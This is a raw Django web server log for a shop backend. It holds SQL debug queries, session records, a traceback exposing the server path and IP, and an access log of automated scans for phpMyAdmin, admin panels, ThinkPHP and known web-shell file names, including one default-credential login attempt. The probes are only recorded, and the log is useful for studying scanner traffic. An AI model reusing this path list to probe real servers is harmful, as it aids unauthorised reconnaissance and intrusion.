"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 07:36:42,825 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 07:36:42,830 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 07:36:42,835 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 07:36:42,839 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 07:36:42,843 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 07:36:42,847 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 07:36:42,853 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 07:36:42,857 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 07:36:42,861 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 07:36:42,865 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 07:36:42,870 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 07:36:42,876 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 07:36:42,881 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 07:36:42,885 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 07:36:42,889 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 07:36:42,893 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 07:36:42,898 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 07:36:42,903 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 07:36:42,907 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 07:36:42,911 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 07:36:42,916 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 07:36:42,920 utils 2749 140297212245760 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 07:36:42] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [31/Dec/2019 07:36:43] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [31/Dec/2019 07:36:43] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [31/Dec/2019 07:40:22] "GET / HTTP/1.0" 302 0 [31/Dec/2019 07:45:25] "GET / HTTP/1.0" 302 0 [31/Dec/2019 07:50:28] "GET / HTTP/1.0" 302 0 [31/Dec/2019 07:55:31] "GET / HTTP/1.0" 302 0 Not Found: /mysql/admin/index.php [31/Dec/2019 07:56:21] "GET /mysql/admin/index.php?lang=en HTTP/1.0" 404 6381 Not Found: /mysql/dbadmin/index.php [31/Dec/2019 07:56:22] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.0" 404 6387 Not Found: /mysql/sqlmanager/index.php [31/Dec/2019 07:56:23] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.0" 404 6396 Not Found: /mysql/mysqlmanager/index.php [31/Dec/2019 07:56:24] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.0" 404 6402 Not Found: /phpmyadmin/index.php [31/Dec/2019 07:56:24] "GET /phpmyadmin/index.php?lang=en HTTP/1.0" 404 6378 Not Found: /phpMyadmin/index.php [31/Dec/2019 07:56:25] "GET /phpMyadmin/index.php?lang=en HTTP/1.0" 404 6378 Not Found: /phpMyAdmin/index.php [31/Dec/2019 07:56:26] "GET /phpMyAdmin/index.php?lang=en HTTP/1.0" 404 6378 Not Found: /phpMyAdmin/index.php [31/Dec/2019 07:56:27] "GET /phpMyAdmin/index.php?lang=en&pma_username=popa3d&pma_password=popa3d HTTP/1.0" 404 6426 [31/Dec/2019 08:05:02] "GET / HTTP/1.0" 302 0 [31/Dec/2019 08:10:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 08:15:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 08:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [31/Dec/2019 08:20:11] "GET / HTTP/1.0" 302 0 [31/Dec/2019 08:22:26] "GET / HTTP/1.0" 302 0 [31/Dec/2019 08:25:13] "GET / HTTP/1.0" 302 0 [31/Dec/2019 08:34:01] "GET / HTTP/1.0" 302 0 [31/Dec/2019 08:39:03] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [31/Dec/2019 08:42:31] "GET /manager/html HTTP/1.0" 404 6346 [31/Dec/2019 08:44:06] "GET / HTTP/1.0" 302 0 [31/Dec/2019 08:52:02] "GET / HTTP/1.0" 302 0 [31/Dec/2019 08:57:04] "GET / HTTP/1.0" 302 0 [31/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [31/Dec/2019 09:14:41] "GET / HTTP/1.0" 302 0 [31/Dec/2019 09:15:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 09:20:11] "GET / HTTP/1.0" 302 0 [31/Dec/2019 09:25:13] "GET / HTTP/1.0" 302 0 [31/Dec/2019 09:30:16] "GET / HTTP/1.0" 302 0 [31/Dec/2019 09:35:19] "GET / HTTP/1.0" 302 0 [31/Dec/2019 09:40:22] "GET / HTTP/1.0" 302 0 [31/Dec/2019 09:45:25] "GET / HTTP/1.0" 302 0 [31/Dec/2019 09:50:28] "GET / HTTP/1.0" 302 0 [31/Dec/2019 09:55:30] "GET / HTTP/1.0" 302 0 [31/Dec/2019 10:05:02] "GET / HTTP/1.0" 302 0 [31/Dec/2019 10:10:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 10:16:34] "GET / HTTP/1.0" 302 0 [31/Dec/2019 10:21:36] "GET / HTTP/1.0" 302 0 [31/Dec/2019 10:26:39] "GET / HTTP/1.0" 302 0 [31/Dec/2019 10:31:42] "GET / HTTP/1.0" 302 0 [31/Dec/2019 10:37:43] "GET / HTTP/1.0" 302 0 [31/Dec/2019 10:40:36] "GET / HTTP/1.0" 302 0 [31/Dec/2019 10:42:45] "GET / HTTP/1.0" 302 0 [31/Dec/2019 10:45:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 10:45:02,825 utils 2749 140297243715328 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '212wls2gfj7nwgdx65hg2ezamp84f8vi' LIMIT 1; args=('212wls2gfj7nwgdx65hg2ezamp84f8vi',) DEBUG 2019-12-31 10:45:02,827 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('212wls2gfj7nwgdx65hg2ezamp84f8vi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T10:45:02.826057+00:00'::timestamptz); args=('212wls2gfj7nwgdx65hg2ezamp84f8vi', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 10, 45, 2, 826057, tzinfo=)) [31/Dec/2019 10:45:02] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 10:47:48] "GET / HTTP/1.0" 302 0 [31/Dec/2019 10:56:57] "GET / HTTP/1.0" 302 0 [31/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 11:10:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 11:10:23] "GET / HTTP/1.0" 302 0 [31/Dec/2019 11:18:47] "GET / HTTP/1.0" 302 0 [31/Dec/2019 11:28:05] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 185.61.137.172/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [31/Dec/2019 11:28:33] "POST /editBlackAndWhiteList HTTP/1.0" 500 64011 [31/Dec/2019 11:33:31] "GET / HTTP/1.0" 302 0 [31/Dec/2019 11:38:36] "GET / HTTP/1.0" 302 0 [31/Dec/2019 11:43:40] "GET / HTTP/1.0" 302 0 [31/Dec/2019 11:44:57] "GET / HTTP/1.0" 302 0 [31/Dec/2019 11:48:43] "GET / HTTP/1.0" 302 0 [31/Dec/2019 11:53:45] "GET / HTTP/1.0" 302 0 [31/Dec/2019 11:58:48] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:03:23] "HEAD / HTTP/1.0" 302 0 DEBUG 2019-12-31 12:03:23,851 utils 2749 140297243715328 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '5q90jtmksyrk981t2cqh796jsnqqkawg' LIMIT 1; args=('5q90jtmksyrk981t2cqh796jsnqqkawg',) DEBUG 2019-12-31 12:03:23,853 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('5q90jtmksyrk981t2cqh796jsnqqkawg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T12:03:23.851712+00:00'::timestamptz); args=('5q90jtmksyrk981t2cqh796jsnqqkawg', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 12, 3, 23, 851712, tzinfo=)) [31/Dec/2019 12:03:23] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:10:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:15:28] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:17:56] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:20:31] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:25:33] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:27:16] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:30:36] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:35:02] "GET /whm-server-status HTTP/1.0" 301 0 [31/Dec/2019 12:35:39] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:42:34] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:50:02] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:55:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 12:58:13] "GET / HTTP/1.0" 302 0 [31/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [31/Dec/2019 13:07:50] "GET /TP/public/index.php HTTP/1.0" 404 6367 Not Found: /TP/index.php [31/Dec/2019 13:07:50] "GET /TP/index.php HTTP/1.0" 404 6346 Not Found: /thinkphp/html/public/index.php [31/Dec/2019 13:07:51] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6400 Not Found: /html/public/index.php [31/Dec/2019 13:07:51] "GET /html/public/index.php HTTP/1.0" 404 6373 Not Found: /public/index.php [31/Dec/2019 13:07:52] "GET /public/index.php HTTP/1.0" 404 6358 Not Found: /TP/html/public/index.php [31/Dec/2019 13:07:52] "GET /TP/html/public/index.php HTTP/1.0" 404 6382 Not Found: /elrekt.php [31/Dec/2019 13:07:53] "GET /elrekt.php HTTP/1.0" 404 6340 Not Found: /index.php [31/Dec/2019 13:07:53] "GET /index.php HTTP/1.0" 404 6337 [31/Dec/2019 13:07:54] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-31 13:07:54,816 utils 2749 140297243715328 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'sx92b0oza5xd5hjdcrnavoa3jlgcwqmy' LIMIT 1; args=('sx92b0oza5xd5hjdcrnavoa3jlgcwqmy',) DEBUG 2019-12-31 13:07:54,818 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('sx92b0oza5xd5hjdcrnavoa3jlgcwqmy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-14T13:07:54.817144+00:00'::timestamptz); args=('sx92b0oza5xd5hjdcrnavoa3jlgcwqmy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 14, 13, 7, 54, 817144, tzinfo=)) [31/Dec/2019 13:07:54] "GET /login/?next=/ HTTP/1.0" 200 1786 [31/Dec/2019 13:10:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 13:15:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 13:21:14] "GET / HTTP/1.0" 302 0 [31/Dec/2019 13:26:17] "GET / HTTP/1.0" 302 0 [31/Dec/2019 13:31:19] "GET / HTTP/1.0" 302 0 [31/Dec/2019 13:38:02] "GET / HTTP/1.0" 302 0 [31/Dec/2019 13:43:05] "GET / HTTP/1.0" 302 0 [31/Dec/2019 13:46:28] "GET / HTTP/1.0" 302 0 [31/Dec/2019 13:48:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 13:53:11] "GET / HTTP/1.0" 302 0 [31/Dec/2019 13:58:14] "GET / HTTP/1.0" 302 0 [31/Dec/2019 14:03:38] "GET / HTTP/1.0" 302 0 [31/Dec/2019 14:10:04] "GET / HTTP/1.0" 302 0 [31/Dec/2019 14:15:07] "GET / HTTP/1.0" 302 0 [31/Dec/2019 14:20:10] "GET / HTTP/1.0" 302 0 [31/Dec/2019 14:25:13] "GET / HTTP/1.0" 302 0 [31/Dec/2019 14:27:28] "GET / HTTP/1.0" 302 0 [31/Dec/2019 14:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [31/Dec/2019 14:30:16] "GET / HTTP/1.0" 302 0 [31/Dec/2019 14:38:16] "GET / HTTP/1.0" 302 0 [31/Dec/2019 14:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [31/Dec/2019 14:44:42] "GET / HTTP/1.0" 302 0 [31/Dec/2019 14:45:08] "GET / HTTP/1.0" 302 0 [31/Dec/2019 14:49:45] "GET / HTTP/1.0" 302 0 [31/Dec/2019 14:57:23] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [31/Dec/2019 14:57:59] "GET /manager/html HTTP/1.0" 404 6346 [31/Dec/2019 15:01:11] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [31/Dec/2019 15:01:11] "GET /robots.txt HTTP/1.0" 404 6340 Not Found: /Adminb5512046/Login.php [31/Dec/2019 15:01:11] "POST /Adminb5512046/Login.php HTTP/1.0" 404 6380 [31/Dec/2019 15:01:12] "GET / HTTP/1.0" 302 0 Not Found: /l.php [31/Dec/2019 15:01:12] "GET /l.php HTTP/1.0" 404 6325 Not Found: /phpinfo.php [31/Dec/2019 15:01:13] "GET /phpinfo.php HTTP/1.0" 404 6343 Not Found: /test.php [31/Dec/2019 15:01:13] "GET /test.php HTTP/1.0" 404 6334 Not Found: /index.php [31/Dec/2019 15:01:14] "POST /index.php HTTP/1.0" 404 6338 Not Found: /bbs.php [31/Dec/2019 15:01:14] "POST /bbs.php HTTP/1.0" 404 6332 Not Found: /forums.php [31/Dec/2019 15:01:16] "POST /forums.php HTTP/1.0" 404 6341 Not Found: /bbs/index.php [31/Dec/2019 15:01:17] "POST /bbs/index.php HTTP/1.0" 404 6350 Not Found: /forum/index.php [31/Dec/2019 15:01:17] "POST /forum/index.php HTTP/1.0" 404 6356 Not Found: /forums/index.php [31/Dec/2019 15:01:18] "POST /forums/index.php HTTP/1.0" 404 6359 Not Found: /help.php [31/Dec/2019 15:01:22] "GET /help.php HTTP/1.0" 404 6334 Not Found: /_query.php [31/Dec/2019 15:01:27] "GET /_query.php HTTP/1.0" 404 6340 Not Found: /test.php [31/Dec/2019 15:01:28] "GET /test.php HTTP/1.0" 404 6334 Not Found: /db_pma.php [31/Dec/2019 15:01:46] "GET /db_pma.php HTTP/1.0" 404 6340 Not Found: /help-e.php [31/Dec/2019 15:02:55] "GET /help-e.php HTTP/1.0" 404 6340 Not Found: /license.php [31/Dec/2019 15:02:55] "GET /license.php HTTP/1.0" 404 6343 Not Found: /log.php [31/Dec/2019 15:02:57] "GET /log.php HTTP/1.0" 404 6331 Not Found: /pmd_online.php [31/Dec/2019 15:02:59] "GET /pmd_online.php HTTP/1.0" 404 6352 Not Found: /x.php [31/Dec/2019 15:03:08] "GET /x.php HTTP/1.0" 404 6325 Not Found: /shell.php [31/Dec/2019 15:03:11] "GET /shell.php HTTP/1.0" 404 6337 Not Found: /htdocs.php [31/Dec/2019 15:03:15] "GET /htdocs.php HTTP/1.0" 404 6340 Not Found: /b.php [31/Dec/2019 15:03:18] "GET /b.php HTTP/1.0" 404 6325 Not Found: /sane.php [31/Dec/2019 15:03:19] "GET /sane.php HTTP/1.0" 404 6334 Not Found: /desktop.ini.php [31/Dec/2019 15:03:20] "GET /desktop.ini.php HTTP/1.0" 404 6355 Not Found: /z.php [31/Dec/2019 15:03:21] "GET /z.php HTTP/1.0" 404 6325 Not Found: /lala-dpr.php [31/Dec/2019 15:04:37] "GET /lala-dpr.php HTTP/1.0" 404 6346 Not Found: /wpc.php [31/Dec/2019 15:04:38] "GET /wpc.php HTTP/1.0" 404 6331 Not Found: /wpo.php [31/Dec/2019 15:04:40] "GET /wpo.php HTTP/1.0" 404 6331 Not Found: /t6nv.php [31/Dec/2019 15:04:43] "GET /t6nv.php HTTP/1.0" 404 6334 Not Found: /muhstik.php [31/Dec/2019 15:04:47] "GET /muhstik.php HTTP/1.0" 404 6343 Not Found: /wp-config.php [31/Dec/2019 15:04:51] "GET /wp-config.php HTTP/1.0" 404 6349 Not Found: /muhstik2.php [31/Dec/2019 15:04:55] "GET /muhstik2.php HTTP/1.0" 404 6346 Not Found: /muhstiks.php [31/Dec/2019 15:04:58] "GET /muhstiks.php HTTP/1.0" 404 6346 Not Found: /muhstik-dpr.php [31/Dec/2019 15:04:59] "GET /muhstik-dpr.php HTTP/1.0" 404 6355 [31/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 Not Found: /lol.php [31/Dec/2019 15:05:06] "GET /lol.php HTTP/1.0" 404 6331 Not Found: /cmd.php [31/Dec/2019 15:05:07] "GET /cmd.php HTTP/1.0" 404 6331 Not Found: /cmv.php [31/Dec/2019 15:05:08] "GET /cmv.php HTTP/1.0" 404 6331 Not Found: /cmdd.php [31/Dec/2019 15:05:08] "GET /cmdd.php HTTP/1.0" 404 6334 Not Found: /knal.php [31/Dec/2019 15:05:09] "GET /knal.php HTTP/1.0" 404 6334 Not Found: /cmd.php [31/Dec/2019 15:05:10] "GET /cmd.php HTTP/1.0" 404 6331 Not Found: /shell.php [31/Dec/2019 15:05:10] "GET /shell.php HTTP/1.0" 404 6337 Not Found: /appserv.php [31/Dec/2019 15:05:16] "GET /appserv.php HTTP/1.0" 404 6343 Not Found: /scripts/setup.php [31/Dec/2019 15:05:17] "GET /scripts/setup.php HTTP/1.0" 404 6361 Not Found: /phpmyadmin/scripts/setup.php [31/Dec/2019 15:05:18] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6394 Not Found: /phpMyAdmin/scripts/setup.php [31/Dec/2019 15:05:19] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6394 Not Found: /phpmyadmin/scripts/db___.init.php [31/Dec/2019 15:06:32] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.0" 404 6409 Not Found: /phpMyAdmin/scripts/db___.init.php [31/Dec/2019 15:06:34] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.0" 404 6409 Not Found: /PMA/scripts/setup.php [31/Dec/2019 15:06:36] "GET /PMA/scripts/setup.php HTTP/1.0" 404 6373 Not Found: /myadmin/scripts/setup.php [31/Dec/2019 15:06:37] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6385 Not Found: /MyAdmin/scripts/setup.php [31/Dec/2019 15:06:38] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6385 Not Found: /pma/scripts/db___.init.php [31/Dec/2019 15:06:39] "GET /pma/scripts/db___.init.php HTTP/1.0" 404 6388 Not Found: /myadmin/scripts/db___.init.php [31/Dec/2019 15:06:43] "GET /myadmin/scripts/db___.init.php HTTP/1.0" 404 6400 Not Found: /MyAdmin/scripts/db___.init.php [31/Dec/2019 15:06:44] "GET /MyAdmin/scripts/db___.init.php HTTP/1.0" 404 6400 Not Found: /cacti/plugins/weathermap/editor.php [31/Dec/2019 15:06:51] "GET /cacti/plugins/weathermap/editor.php HTTP/1.0" 404 6415 Not Found: /weathermap/editor.php [31/Dec/2019 15:06:52] "GET /weathermap/editor.php HTTP/1.0" 404 6373 Not Found: /index.php [31/Dec/2019 15:06:54] "GET 